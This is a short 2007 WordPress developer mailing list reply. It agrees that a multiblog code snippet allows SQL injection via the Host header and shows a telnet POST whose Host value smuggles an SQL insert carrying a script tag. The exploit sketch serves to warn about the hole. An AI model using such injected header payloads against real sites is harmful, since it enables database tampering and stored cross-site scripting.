[wp-hackers] Virtual Multiblog
Jeremy Visser
jeremy.visser at gmail.com
Mon Nov 26 03:42:05 GMT 2007
On Sun, 2007-11-25 at 14:03 -0600, Andy Skelton wrote:
> At first glance, this looks like very unsafe code. It opens the door
> to SQL injection attacks via the Host header.
Ah yes, forgot about that. Exploiting would be as simple as:
$ telnet example.com 80
POST /wordpress/wp-comments-post.php HTTP/1.1\r\n
Host: example.com_posts post_content VALUES ('<script>muahahaha</script>') --\r\n
\r\n
More information about the wp-hackers
mailing list